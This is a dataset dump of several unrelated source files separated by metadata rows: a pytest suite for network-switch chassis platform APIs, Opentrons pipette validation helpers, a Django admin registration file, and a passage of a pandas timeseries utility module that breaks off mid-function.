            pytest.fail("num_thermals is not an integer")

        thermal_list = chassis.get_all_thermals(platform_api_conn)
        pytest_assert(thermal_list is not None, "Failed to retrieve thermals")
        pytest_assert(isinstance(thermal_list, list) and len(thermal_list) == num_thermals, "Thermals appear to be incorrect")

        for i in range(num_thermals):
            thermal = chassis.get_thermal(platform_api_conn, i)
            self.expect(thermal and thermal == thermal_list[i], "Thermal {} is incorrect".format(i))
        self.assert_expectations()

    def test_sfps(self, duthost, localhost, platform_api_conn):
        """SFP count and per-index lookups must agree with the full list."""
        # TODO: Ensure the number of SFPs and that the returned list is correct for this platform
        try:
            num_sfps = int(chassis.get_num_sfps(platform_api_conn))
        except Exception:
            pytest.fail("num_sfps is not an integer")

        sfp_list = chassis.get_all_sfps(platform_api_conn)
        pytest_assert(sfp_list is not None, "Failed to retrieve SFPs")
        pytest_assert(isinstance(sfp_list, list) and len(sfp_list) == num_sfps, "SFPs appear to be incorrect")

        for i in range(num_sfps):
            sfp = chassis.get_sfp(platform_api_conn, i)
            self.expect(sfp and sfp == sfp_list[i], "SFP {} is incorrect".format(i))
        self.assert_expectations()

    def test_status_led(self, duthost, localhost, platform_api_conn):
        """Each supported LED color must be settable and read back identically."""
        # TODO: Get a platform-specific list of available colors for the status LED
        LED_COLOR_LIST = [
            "off",
            "red",
            "amber",
            "green",
        ]

        for color in LED_COLOR_LIST:
            result = chassis.set_status_led(platform_api_conn, color)
            if self.expect(result is not None, "Failed to perform set_status_led"):
                self.expect(result is True, "Failed to set status_led to {}".format(color))

            color_actual = chassis.get_status_led(platform_api_conn)
            if self.expect(color_actual is not None, "Failed to retrieve status_led"):
                if self.expect(isinstance(color_actual, str), "Status LED color appears incorrect"):
                    self.expect(color == color_actual, "Status LED color incorrect (expected: {}, actual: {})".format(color, color_actual))
        self.assert_expectations()

    def test_get_thermal_manager(self, duthost, localhost, platform_api_conn):
        """A thermal manager object must be retrievable."""
        thermal_mgr = chassis.get_thermal_manager(platform_api_conn)
        pytest_assert(thermal_mgr is not None, "Failed to retrieve thermal manager")

    def test_get_watchdog(self, duthost, localhost, platform_api_conn):
        """A watchdog object must be retrievable."""
        watchdog = chassis.get_watchdog(platform_api_conn)
        pytest_assert(watchdog is not None, "Failed to retrieve watchdog")

    def test_get_eeprom(self, duthost, localhost, platform_api_conn):
        """A system EEPROM object must be retrievable."""
        eeprom = chassis.get_eeprom(platform_api_conn)
        pytest_assert(eeprom is not None, "Failed to retrieve system EEPROM")
| 52.317757
| 146
| 0.711742
|
import logging
import re
import pytest
import yaml
from tests.common.helpers.assertions import pytest_assert
from tests.common.helpers.platform_api import chassis
from platform_api_test_base import PlatformApiTestBase
logger = logging.getLogger(__name__)
pytestmark = [
pytest.mark.disable_loganalyzer,
pytest.mark.topology('any')
]
REGEX_MAC_ADDRESS = r'^([0-9A-Fa-f]{2}:){5}([0-9A-Fa-f]{2})$'
REGEX_SERIAL_NUMBER = r'^[A-Za-z0-9]+$'
ONIE_TLVINFO_TYPE_CODE_PRODUCT_NAME = '0x21'
ONIE_TLVINFO_TYPE_CODE_PART_NUMBER = '0x22'
ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER = '0x23'
ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR = '0x24'
ONIE_TLVINFO_TYPE_CODE_MFR_DATE = '0x25'
ONIE_TLVINFO_TYPE_CODE_DEVICE_VERSION = '0x26'
ONIE_TLVINFO_TYPE_CODE_LABEL_REVISION = '0x27'
ONIE_TLVINFO_TYPE_CODE_PLATFORM_NAME = '0x28'
ONIE_TLVINFO_TYPE_CODE_ONIE_VERSION = '0x29'
ONIE_TLVINFO_TYPE_CODE_NUM_MACS = '0x2A'
ONIE_TLVINFO_TYPE_CODE_MANUFACTURER = '0x2B'
ONIE_TLVINFO_TYPE_CODE_COUNTRY_CODE = '0x2C'
ONIE_TLVINFO_TYPE_CODE_VENDOR = '0x2D'
ONIE_TLVINFO_TYPE_CODE_DIAG_VERSION = '0x2E'
ONIE_TLVINFO_TYPE_CODE_SERVICE_TAG = '0x2F'
ONIE_TLVINFO_TYPE_CODE_VENDOR_EXT = '0xFD'
ONIE_TLVINFO_TYPE_CODE_CRC32 = '0xFE'
class TestChassisApi(PlatformApiTestBase):
def test_get_name(self, duthost, localhost, platform_api_conn):
name = chassis.get_name(platform_api_conn)
pytest_assert(name is not None, "Unable to retrieve chassis name")
pytest_assert(isinstance(name, str), "Chassis name appears incorrect")
def test_get_presence(self, duthost, localhost, platform_api_conn):
presence = chassis.get_presence(platform_api_conn)
pytest_assert(presence is not None, "Unable to retrieve chassis presence")
pytest_assert(isinstance(presence, bool), "Chassis presence appears incorrect")
pytest_assert(presence is True, "Chassis is not present")
def test_get_model(self, duthost, localhost, platform_api_conn):
model = chassis.get_model(platform_api_conn)
pytest_assert(model is not None, "Unable to retrieve chassis model")
pytest_assert(isinstance(model, str), "Chassis model appears incorrect")
def test_get_serial(self, duthost, localhost, platform_api_conn):
serial = chassis.get_serial(platform_api_conn)
pytest_assert(serial is not None, "Unable to retrieve chassis serial number")
pytest_assert(isinstance(serial, str), "Chassis serial number appears incorrect")
def test_get_status(self, duthost, localhost, platform_api_conn):
status = chassis.get_status(platform_api_conn)
pytest_assert(status is not None, "Unable to retrieve chassis status")
pytest_assert(isinstance(status, bool), "Chassis status appears incorrect")
def test_get_base_mac(self, duthost, localhost, platform_api_conn):
base_mac = chassis.get_base_mac(platform_api_conn)
pytest_assert(base_mac is not None, "Failed to retrieve base MAC address")
pytest_assert(re.match(REGEX_MAC_ADDRESS, base_mac), "Base MAC address appears to be incorrect")
if 'base_mac' in duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars:
expected_base_mac = duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars['base_mac']
pytest_assert(base_mac == expected_base_mac, "Base MAC address is incorrect")
else:
logger.warning('Inventory file does not contain base MAC address for {}'.format(duthost.hostname))
def test_get_serial_number(self, duthost, localhost, platform_api_conn):
serial = chassis.get_serial_number(platform_api_conn).rstrip('\x00')
pytest_assert(serial is not None, "Failed to retrieve serial number")
pytest_assert(re.match(REGEX_SERIAL_NUMBER, serial), "Serial number appears to be incorrect")
if 'serial' in duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars:
expected_serial = duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars['serial']
pytest_assert(serial == expected_serial, "Serial number is incorrect")
else:
logger.warning('Inventory file does not contain serial number for {}'.format(duthost.hostname))
def test_get_system_eeprom_info(self, duthost, localhost, platform_api_conn):
VALID_ONIE_TLVINFO_TYPE_CODES_LIST = [
ONIE_TLVINFO_TYPE_CODE_PRODUCT_NAME,
ONIE_TLVINFO_TYPE_CODE_PART_NUMBER,
ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER,
ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR,
ONIE_TLVINFO_TYPE_CODE_MFR_DATE,
ONIE_TLVINFO_TYPE_CODE_DEVICE_VERSION,
ONIE_TLVINFO_TYPE_CODE_LABEL_REVISION,
ONIE_TLVINFO_TYPE_CODE_PLATFORM_NAME,
ONIE_TLVINFO_TYPE_CODE_ONIE_VERSION,
ONIE_TLVINFO_TYPE_CODE_NUM_MACS,
ONIE_TLVINFO_TYPE_CODE_MANUFACTURER,
ONIE_TLVINFO_TYPE_CODE_COUNTRY_CODE,
ONIE_TLVINFO_TYPE_CODE_VENDOR,
ONIE_TLVINFO_TYPE_CODE_DIAG_VERSION,
ONIE_TLVINFO_TYPE_CODE_SERVICE_TAG,
ONIE_TLVINFO_TYPE_CODE_VENDOR_EXT,
ONIE_TLVINFO_TYPE_CODE_CRC32
]
MINIMUM_REQUIRED_TYPE_CODES_LIST = [
ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER,
ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR,
ONIE_TLVINFO_TYPE_CODE_CRC32
]
syseeprom_info_dict = chassis.get_system_eeprom_info(platform_api_conn)
pytest_assert(syseeprom_info_dict is not None, "Failed to retrieve system EEPROM data")
pytest_assert(isinstance(syseeprom_info_dict, dict), "System EEPROM data is not in the expected format")
syseeprom_type_codes_list = syseeprom_info_dict.keys()
pytest_assert(set(syseeprom_type_codes_list) <= set(VALID_ONIE_TLVINFO_TYPE_CODES_LIST), "Invalid TlvInfo type code found")
pytest_assert(set(MINIMUM_REQUIRED_TYPE_CODES_LIST) <= set(syseeprom_type_codes_list), "Minimum required TlvInfo type codes not provided")
base_mac = syseeprom_info_dict[ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR]
pytest_assert(base_mac is not None, "Failed to retrieve base MAC address")
pytest_assert(re.match(REGEX_MAC_ADDRESS, base_mac), "Base MAC address appears to be incorrect")
serial = syseeprom_info_dict[ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER]
pytest_assert(serial is not None, "Failed to retrieve serial number")
pytest_assert(re.match(REGEX_SERIAL_NUMBER, serial), "Serial number appears to be incorrect")
if 'syseeprom_info' in duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars:
expected_syseeprom_info_dict = duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars['syseeprom_info']
pytest_assert(syseeprom_info_dict == expected_syseeprom_info_dict, "System EEPROM info is incorrect")
else:
logger.warning('Inventory file does not contain system EEPROM info for {}'.format(duthost.hostname))
def test_get_reboot_cause(self, duthost, localhost, platform_api_conn):
reboot_cause = chassis.get_reboot_cause(platform_api_conn)
# to make the call and it uses JSON, the tuple is changed to a list
pytest_assert(reboot_cause is not None, "Failed to retrieve reboot cause")
pytest_assert(isinstance(reboot_cause, list) and len(reboot_cause) == 2, "Reboot cause appears to be incorrect")
def test_components(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of components and that the returned list is correct for this platform
try:
num_components = int(chassis.get_num_components(platform_api_conn))
except:
pytest.fail("num_components is not an integer")
component_list = chassis.get_all_components(platform_api_conn)
pytest_assert(component_list is not None, "Failed to retrieve components")
pytest_assert(isinstance(component_list, list) and len(component_list) == num_components, "Components appear to be incorrect")
for i in range(num_components):
component = chassis.get_component(platform_api_conn, i)
self.expect(component and component == component_list[i], "Component {} is incorrect".format(i))
self.assert_expectations()
def test_modules(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of modules and that the returned list is correct for this platform
try:
num_modules = int(chassis.get_num_modules(platform_api_conn))
except:
pytest.fail("num_modules is not an integer")
module_list = chassis.get_all_modules(platform_api_conn)
pytest_assert(module_list is not None, "Failed to retrieve modules")
pytest_assert(isinstance(module_list, list) and len(module_list) == num_modules, "Modules appear to be incorrect")
for i in range(num_modules):
module = chassis.get_module(platform_api_conn, i)
self.expect(module and module == module_list[i], "Module {} is incorrect".format(i))
self.assert_expectations()
def test_fans(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of fans and that the returned list is correct for this platform
try:
num_fans = int(chassis.get_num_fans(platform_api_conn))
except:
pytest.fail("num_fans is not an integer")
fan_list = chassis.get_all_fans(platform_api_conn)
pytest_assert(fan_list is not None, "Failed to retrieve fans")
pytest_assert(isinstance(fan_list, list) and len(fan_list) == num_fans, "Fans appear to be incorrect")
for i in range(num_fans):
fan = chassis.get_fan(platform_api_conn, i)
self.expect(fan and fan == fan_list[i], "Fan {} is incorrect".format(i))
self.assert_expectations()
def test_fan_drawers(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of fan drawers and that the returned list is correct for this platform
try:
num_fan_drawers = int(chassis.get_num_fan_drawers(platform_api_conn))
except:
pytest.fail("num_fan_drawers is not an integer")
fan_drawer_list = chassis.get_all_fan_drawers(platform_api_conn)
pytest_assert(fan_drawer_list is not None, "Failed to retrieve fan drawers")
pytest_assert(isinstance(fan_drawer_list, list) and len(fan_drawer_list) == num_fan_drawers, "Fan drawerss appear to be incorrect")
for i in range(num_fan_drawers):
fan_drawer = chassis.get_fan_drawer(platform_api_conn, i)
self.expect(fan_drawer and fan_drawer == fan_drawer_list[i], "Fan drawer {} is incorrect".format(i))
self.assert_expectations()
def test_psus(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of PSUs and that the returned list is correct for this platform
try:
num_psus = int(chassis.get_num_psus(platform_api_conn))
except:
pytest.fail("num_psus is not an integer")
psu_list = chassis.get_all_psus(platform_api_conn)
pytest_assert(psu_list is not None, "Failed to retrieve PSUs")
pytest_assert(isinstance(psu_list, list) and len(psu_list) == num_psus, "PSUs appear to be incorrect")
for i in range(num_psus):
psu = chassis.get_psu(platform_api_conn, i)
self.expect(psu and psu == psu_list[i], "PSU {} is incorrect".format(i))
self.assert_expectations()
def test_thermals(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of thermals and that the returned list is correct for this platform
try:
num_thermals = int(chassis.get_num_thermals(platform_api_conn))
except:
pytest.fail("num_thermals is not an integer")
thermal_list = chassis.get_all_thermals(platform_api_conn)
pytest_assert(thermal_list is not None, "Failed to retrieve thermals")
pytest_assert(isinstance(thermal_list, list) and len(thermal_list) == num_thermals, "Thermals appear to be incorrect")
for i in range(num_thermals):
thermal = chassis.get_thermal(platform_api_conn, i)
self.expect(thermal and thermal == thermal_list[i], "Thermal {} is incorrect".format(i))
self.assert_expectations()
def test_sfps(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of SFPs and that the returned list is correct for this platform
try:
num_sfps = int(chassis.get_num_sfps(platform_api_conn))
except:
pytest.fail("num_sfps is not an integer")
sfp_list = chassis.get_all_sfps(platform_api_conn)
pytest_assert(sfp_list is not None, "Failed to retrieve SFPs")
pytest_assert(isinstance(sfp_list, list) and len(sfp_list) == num_sfps, "SFPs appear to be incorrect")
for i in range(num_sfps):
sfp = chassis.get_sfp(platform_api_conn, i)
self.expect(sfp and sfp == sfp_list[i], "SFP {} is incorrect".format(i))
self.assert_expectations()
def test_status_led(self, duthost, localhost, platform_api_conn):
# TODO: Get a platform-specific list of available colors for the status LED
LED_COLOR_LIST = [
"off",
"red",
"amber",
"green",
]
for color in LED_COLOR_LIST:
result = chassis.set_status_led(platform_api_conn, color)
if self.expect(result is not None, "Failed to perform set_status_led"):
self.expect(result is True, "Failed to set status_led to {}".format(color))
color_actual = chassis.get_status_led(platform_api_conn)
if self.expect(color_actual is not None, "Failed to retrieve status_led"):
if self.expect(isinstance(color_actual, str), "Status LED color appears incorrect"):
self.expect(color == color_actual, "Status LED color incorrect (expected: {}, actual: {})".format(color, color_actual))
self.assert_expectations()
def test_get_thermal_manager(self, duthost, localhost, platform_api_conn):
thermal_mgr = chassis.get_thermal_manager(platform_api_conn)
pytest_assert(thermal_mgr is not None, "Failed to retrieve thermal manager")
def test_get_watchdog(self, duthost, localhost, platform_api_conn):
watchdog = chassis.get_watchdog(platform_api_conn)
pytest_assert(watchdog is not None, "Failed to retrieve watchdog")
def test_get_eeprom(self, duthost, localhost, platform_api_conn):
eeprom = chassis.get_eeprom(platform_api_conn)
pytest_assert(eeprom is not None, "Failed to retrieve system EEPROM")
| true
| true
|
f705088ca6ef0bf0d1e239d32b41a163dbc29fd3
| 5,189
|
py
|
Python
|
api/src/opentrons/protocols/api_support/instrument.py
|
mrakitin/opentrons
|
d9c7ed23d13cdb62bd1bc397dc2871d4bd5b77e9
|
[
"Apache-2.0"
] | null | null | null |
api/src/opentrons/protocols/api_support/instrument.py
|
mrakitin/opentrons
|
d9c7ed23d13cdb62bd1bc397dc2871d4bd5b77e9
|
[
"Apache-2.0"
] | null | null | null |
api/src/opentrons/protocols/api_support/instrument.py
|
mrakitin/opentrons
|
d9c7ed23d13cdb62bd1bc397dc2871d4bd5b77e9
|
[
"Apache-2.0"
] | null | null | null |
import logging
from typing import Optional, Any
from opentrons import types
from opentrons.calibration_storage import get
from opentrons.calibration_storage.types import TipLengthCalNotFound
from opentrons.hardware_control.dev_types import PipetteDict
from opentrons.protocol_api.labware import Labware, Well
from opentrons.protocols.api_support.types import APIVersion
from opentrons_shared_data.protocol.dev_types import LiquidHandlingCommand, \
BlowoutLocation
def validate_blowout_location(
        api_version: APIVersion,
        liquid_handling_command: LiquidHandlingCommand,
        blowout_location: Optional[Any]) -> None:
    """Raise ValueError when a blowout location is not allowed.

    A blowout location requires API version >= 2.8, and each liquid
    handling command forbids specific locations (consolidate cannot blow
    out into the source well; distribute cannot blow out into the
    destination well; transfer only accepts the BlowoutLocation values).
    """
    if blowout_location and api_version < APIVersion(2, 8):
        raise ValueError(
            'Cannot specify blowout location when using api'
            ' version below 2.8, current version is {api_version}'.format(
                api_version=api_version))
    # each branch below raises, so plain ifs are equivalent to the
    # original elif chain
    if liquid_handling_command == 'consolidate' \
            and blowout_location == 'source well':
        raise ValueError(
            "blowout location for consolidate cannot be source well")
    if liquid_handling_command == 'distribute' \
            and blowout_location == 'destination well':
        raise ValueError(
            "blowout location for distribute cannot be destination well")
    if liquid_handling_command == 'transfer' and blowout_location \
            and blowout_location not in [
                location.value for location in BlowoutLocation]:
        raise ValueError(
            "blowout location should be either 'source well', "
            " 'destination well', or 'trash'"
            " but it is {}".format(blowout_location))
def tip_length_for(pipette: PipetteDict, tiprack: Labware) -> float:
    """Return the effective tip length for this pipette/tiprack pair.

    Prefers a stored tip-length calibration; falls back to the nominal
    tip length minus the pipette's tip overlap for this tiprack.
    """
    try:
        calibration = get.load_tip_length_calibration(
            pipette['pipette_id'],
            tiprack._implementation.get_definition())
        return calibration.tip_length
    except TipLengthCalNotFound:
        # no calibration on record: derive the length from the rack's
        # nominal tip length and the pipette's overlap table
        overlap = pipette['tip_overlap'].get(
            tiprack.uri,
            pipette['tip_overlap']['default'])
        return tiprack.tip_length - overlap
# Acceptable Opentrons tiprack volumes (uL) per pipette family, keyed by
# the pipette-model prefix (e.g. 'p300' from 'p300_single_gen2'); used by
# validate_tiprack to warn about mismatched pipette/tiprack pairs.
VALID_PIP_TIPRACK_VOL = {
    'p10': [10, 20],
    'p20': [10, 20],
    'p50': [200, 300],
    'p300': [200, 300],
    'p1000': [1000]
}
def validate_tiprack(
        instrument_name: str,
        tiprack: Labware,
        log: logging.Logger) -> None:
    """Log a warning when an Opentrons tiprack's volume doesn't suit the pipette."""
    # TODO AA 2020-06-24 - we should instead add the acceptable Opentrons
    # tipracks to the pipette as a refactor
    # only Opentrons-namespace tipracks have entries in the volume table
    definition = tiprack._implementation.get_definition()
    if definition['namespace'] != 'opentrons':
        return
    pipette_family = instrument_name.split('_')[0]
    rack_volume = tiprack.wells()[0].max_volume
    if rack_volume not in VALID_PIP_TIPRACK_VOL[pipette_family]:
        log.warning(
            f'The pipette {instrument_name} and its tiprack '
            f'{tiprack.load_name} in slot {tiprack.parent} appear to '
            'be mismatched. Please check your protocol before running '
            'on the robot.')
def determine_drop_target(
        api_version: APIVersion,
        location: Well,
        return_height: float,
        version_breakpoint: Optional[APIVersion] = None) -> types.Location:
    """Determine the tip drop target based on well and API version.

    :param api_version: the protocol's API version.
    :param location: the target well (a tiprack well for modern versions).
    :param return_height: fraction of the tip length to descend below the
        top of the tiprack (used only for the modern behavior).
    :param version_breakpoint: API version at which the behavior switches;
        defaults to APIVersion(2, 2). (Annotation fixed to
        Optional[APIVersion]: the parameter defaults to None, so the bare
        APIVersion annotation was an implicit-Optional violation.)
    :returns: the location at which to drop the tip.
    """
    version_breakpoint = version_breakpoint or APIVersion(2, 2)
    if api_version < version_breakpoint:
        # legacy behavior: drop 10 mm above the bottom of the well
        bot = location.bottom()
        return types.Location(
            point=bot.point._replace(z=bot.point.z + 10),
            labware=location)
    else:
        # modern behavior: descend a fraction of the tip length below
        # the top of the tiprack
        tr = location.parent
        assert tr.is_tiprack
        z_height = return_height * tr.tip_length
        return location.top(-z_height)
def validate_can_aspirate(location: types.Location) -> None:
    """Reject aspiration from a tiprack.

    :param location: the intended aspiration target.
    :raises RuntimeError: when the location sits inside a tiprack.
    """
    if _is_tiprack(location):
        raise RuntimeError("Cannot aspirate a tiprack")
def validate_can_dispense(location: types.Location) -> None:
    """Reject dispensing into a tiprack.

    :param location: the intended dispense target.
    :raises RuntimeError: when the location sits inside a tiprack.
    """
    if _is_tiprack(location):
        raise RuntimeError("Cannot dispense to a tiprack")
def _is_tiprack(location: types.Location) -> bool:
    # A location counts as a tiprack when its labware's parent exists and
    # is flagged as a tiprack.
    parent = location.labware.as_labware().parent
    return parent and parent.is_tiprack
| 36.034722
| 77
| 0.671035
|
import logging
from typing import Optional, Any
from opentrons import types
from opentrons.calibration_storage import get
from opentrons.calibration_storage.types import TipLengthCalNotFound
from opentrons.hardware_control.dev_types import PipetteDict
from opentrons.protocol_api.labware import Labware, Well
from opentrons.protocols.api_support.types import APIVersion
from opentrons_shared_data.protocol.dev_types import LiquidHandlingCommand, \
BlowoutLocation
def validate_blowout_location(
api_version: APIVersion,
liquid_handling_command: LiquidHandlingCommand,
blowout_location: Optional[Any]) -> None:
if blowout_location and api_version < APIVersion(2, 8):
raise ValueError(
'Cannot specify blowout location when using api' +
' version below 2.8, current version is {api_version}'
.format(api_version=api_version))
elif liquid_handling_command == 'consolidate' \
and blowout_location == 'source well':
raise ValueError(
"blowout location for consolidate cannot be source well")
elif liquid_handling_command == 'distribute' \
and blowout_location == 'destination well':
raise ValueError(
"blowout location for distribute cannot be destination well")
elif liquid_handling_command == 'transfer' and \
blowout_location and \
blowout_location not in \
[location.value for location in BlowoutLocation]:
raise ValueError(
"blowout location should be either 'source well', " +
" 'destination well', or 'trash'" +
f" but it is {blowout_location}")
def tip_length_for(pipette: PipetteDict, tiprack: Labware) -> float:
def _build_length_from_overlap() -> float:
tip_overlap = pipette['tip_overlap'].get(
tiprack.uri,
pipette['tip_overlap']['default'])
tip_length = tiprack.tip_length
return tip_length - tip_overlap
try:
return get.load_tip_length_calibration(
pipette['pipette_id'],
tiprack._implementation.get_definition()
).tip_length
except TipLengthCalNotFound:
return _build_length_from_overlap()
VALID_PIP_TIPRACK_VOL = {
'p10': [10, 20],
'p20': [10, 20],
'p50': [200, 300],
'p300': [200, 300],
'p1000': [1000]
}
def validate_tiprack(
instrument_name: str,
tiprack: Labware,
log: logging.Logger) -> None:
if tiprack._implementation.get_definition()['namespace'] \
== 'opentrons':
tiprack_vol = tiprack.wells()[0].max_volume
valid_vols = VALID_PIP_TIPRACK_VOL[instrument_name.split('_')[0]]
if tiprack_vol not in valid_vols:
log.warning(
f'The pipette {instrument_name} and its tiprack '
f'{tiprack.load_name} in slot {tiprack.parent} appear to '
'be mismatched. Please check your protocol before running '
'on the robot.')
def determine_drop_target(
api_version: APIVersion,
location: Well,
return_height: float,
version_breakpoint: APIVersion = None) -> types.Location:
version_breakpoint = version_breakpoint or APIVersion(2, 2)
if api_version < version_breakpoint:
bot = location.bottom()
return types.Location(
point=bot.point._replace(z=bot.point.z + 10),
labware=location)
else:
tr = location.parent
assert tr.is_tiprack
z_height = return_height * tr.tip_length
return location.top(-z_height)
def validate_can_aspirate(location: types.Location) -> None:
if _is_tiprack(location):
raise RuntimeError("Cannot aspirate a tiprack")
def validate_can_dispense(location: types.Location) -> None:
if _is_tiprack(location):
raise RuntimeError("Cannot dispense to a tiprack")
def _is_tiprack(location: types.Location) -> bool:
labware = location.labware.as_labware()
return labware.parent and labware.parent.is_tiprack
| true
| true
|
f70508c8381da2991bd613dc3eb8473318c12f5a
| 436
|
py
|
Python
|
cookies/admin.py
|
ADpDinamo/site
|
d7313cd6c151a381ccc803b81768673587cb8d45
|
[
"Apache-2.0"
] | null | null | null |
cookies/admin.py
|
ADpDinamo/site
|
d7313cd6c151a381ccc803b81768673587cb8d45
|
[
"Apache-2.0"
] | 8
|
2021-03-19T10:14:39.000Z
|
2022-03-12T00:24:41.000Z
|
cookies/admin.py
|
ADpDinamo/site
|
d7313cd6c151a381ccc803b81768673587cb8d45
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib import admin
from .models import CookiePageText, TOSPageText, StatutPageText
# Register your models here.
class CookieAdmin(admin.ModelAdmin):
    """Default admin configuration for CookiePageText."""
    pass
class TOSPageTextAdmin(admin.ModelAdmin):
    """Default admin configuration for TOSPageText."""
    pass
class StatutPageTextAdmin(admin.ModelAdmin):
    """Default admin configuration for StatutPageText."""
    pass
# Expose the page-text models in the Django admin site.
admin.site.register(CookiePageText, CookieAdmin)
admin.site.register(TOSPageText, TOSPageTextAdmin)
admin.site.register(StatutPageText, StatutPageTextAdmin)
| 29.066667
| 63
| 0.823394
|
from django.contrib import admin
from .models import CookiePageText, TOSPageText, StatutPageText
class CookieAdmin(admin.ModelAdmin):
pass
class TOSPageTextAdmin(admin.ModelAdmin):
pass
class StatutPageTextAdmin(admin.ModelAdmin):
pass
admin.site.register(CookiePageText, CookieAdmin)
admin.site.register(TOSPageText, TOSPageTextAdmin)
admin.site.register(StatutPageText, StatutPageTextAdmin)
| true
| true
|
f7050908f1d5cb294790a504bf31adbcb7c5b54b
| 41,157
|
py
|
Python
|
src/pyg_base/_pandas.py
|
nclarey/pyg-base
|
a7b90ea2ad4d740d8e7f8c4a7c9d341d36373862
|
[
"MIT"
] | null | null | null |
src/pyg_base/_pandas.py
|
nclarey/pyg-base
|
a7b90ea2ad4d740d8e7f8c4a7c9d341d36373862
|
[
"MIT"
] | null | null | null |
src/pyg_base/_pandas.py
|
nclarey/pyg-base
|
a7b90ea2ad4d740d8e7f8c4a7c9d341d36373862
|
[
"MIT"
] | null | null | null |
"""
We want to simplify the operations for pandas dataframes assuming we are using timeseries as the main objects.
When we have multiple timeseries, we will:
1) calculate joint index using df_index()
2) reindex each timeseries to the joint index
We then need to worry about multiple columns if there are. If none, each timeseries will be considered as pd.Series
If there are multiple columns, we will perform the calculations columns by columns.
"""
from pyg_base._types import is_df, is_str, is_num, is_tss, is_int, is_arr, is_ts, is_arrs, is_tuples, is_pd
from pyg_base._dictable import dictable
from pyg_base._as_list import as_list
from pyg_base._zip import zipper
from pyg_base._reducer import reducing, reducer
from pyg_base._decorators import wrapper
from pyg_base._loop import loop
from pyg_base._dates import dt
import pandas as pd
import numpy as np
from copy import copy
import inspect
import datetime
from operator import add, mul
__all__ = ['df_fillna', 'df_index', 'df_reindex', 'df_columns', 'presync', 'np_reindex', 'nona', 'df_slice', 'df_unslice', 'min_', 'max_', 'add_', 'mul_', 'sub_', 'div_', 'pow_']
def _list(values):
"""
>>> assert _list([1,2,[3,4,5,[6,7]],dict(a =[8,9], b=[10,[11,12]])]) == [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
>>> assert _list(1) == [1]
>>> assert _list(dict(a=1, b=2)) == [1,2]
"""
if isinstance(values, list):
return sum([_list(df) for df in values], [])
elif isinstance(values, dict):
return _list(list(values.values()))
else:
return [values]
@loop(list, tuple, dict)
def _index(ts):
    """Return an index-like for ts: the object itself if it is already a
    pd.Index, a pandas object's .index, or a numpy array's length; raise
    for anything else."""
    if isinstance(ts, pd.Index):
        return ts
    if is_pd(ts):
        return ts.index
    if is_arr(ts):
        return len(ts)
    raise ValueError('did not provide an index')
def _df_index(indexes, index):
    """Combine a list of pd.Index objects according to a join policy.

    `index` is either a string whose first letter selects the policy
    (i=inner/intersection, o=outer/union, l=left/first, r=right/last) or
    an explicit index-like object. Returns None when `indexes` is empty
    or the policy letter is unrecognised.
    """
    if len(indexes) == 0:
        return None
    if not is_str(index):
        # an explicit index-like object was supplied
        return _index(index)
    policy = index[0].lower()
    if policy == 'i':
        return reducing('intersection')(indexes)
    if policy == 'o':
        return reducing('union')(indexes)
    if policy == 'l':
        return indexes[0]
    if policy == 'r':
        return indexes[-1]
def _np_index(indexes, index):
if len(indexes) > 0:
if index[0].lower() == 'i':#nner
return min(indexes)
elif index[0].lower() == 'o':#uter
return max(indexes)
elif index[0].lower() == 'l':#uter
return indexes[0]
elif index[0].lower() == 'r':#uter
return indexes[-1]
else:
return None
def df_index(seq, index = 'inner'):
    """
    Determines a joint index of multiple timeseries objects.

    :Parameters:
    ----------------
    seq : a (possibly nested) sequence of timeseries/non-timeseries
        objects within lists/dicts
    index : str, optional
        join policy ('inner'/'outer'/'left'/'right') or an explicit
        index. The default is 'inner'.

    :Returns:
    -------
    pd.Index (or int for numpy arrays), the joint index.

    :Example:
    ---------
    >>> tss = [pd.Series(np.random.normal(0,1,10), drange(-i, 9-i)) for i in range(5)]
    >>> assert len(df_index(tss, 'inner')) == 6
    >>> assert len(df_index(tss, 'outer')) == 14
    """
    flattened = _list(seq)
    # pandas objects take precedence: join their indexes if any exist
    pd_indexes = [obj.index for obj in flattened if is_pd(obj)]
    if len(pd_indexes):
        return _df_index(pd_indexes, index)
    # otherwise fall back to joining lengths of numpy arrays
    lengths = [len(obj) for obj in flattened if is_arr(obj)]
    if len(lengths):
        return _np_index(lengths, index)
    return None
def df_columns(seq, index = 'inner'):
    """
    returns the joint columns of the dataframes in seq.

    Dataframes with duplicate column names are treated like numpy
    arrays: only their column COUNT participates in the join.

    :Example:
    ---------
    >>> a = pd.DataFrame(np.random.normal(0,1,(100,5)), drange(-99), list('abcde'))
    >>> b = pd.DataFrame(np.random.normal(0,1,(100,5)), drange(-99), list('bcdef'))
    >>> assert list(df_columns([a,b])) == list('bcde')
    >>> assert list(df_columns([a,b], 'oj')) == list('abcdef')

    :Parameters:
    ----------
    seq : sequence of dataframes
    index : str, optional
        join policy. The default is 'inner'.

    :Returns:
    -------
    pd.Index / int / None
    """
    flattened = _list(seq)
    # multi-column frames with unique headers contribute their columns
    proper_columns = [obj.columns for obj in flattened
                      if is_df(obj) and obj.shape[1] > 1
                      and len(set(obj.columns)) == obj.shape[1]]
    if len(proper_columns):
        return _df_index(proper_columns, index)
    # otherwise join the column counts of the remaining 2-d objects
    counts = [obj.shape[1] for obj in flattened
              if (is_arr(obj) or is_df(obj)) and len(obj.shape) > 1
              and obj.shape[1] > 1]
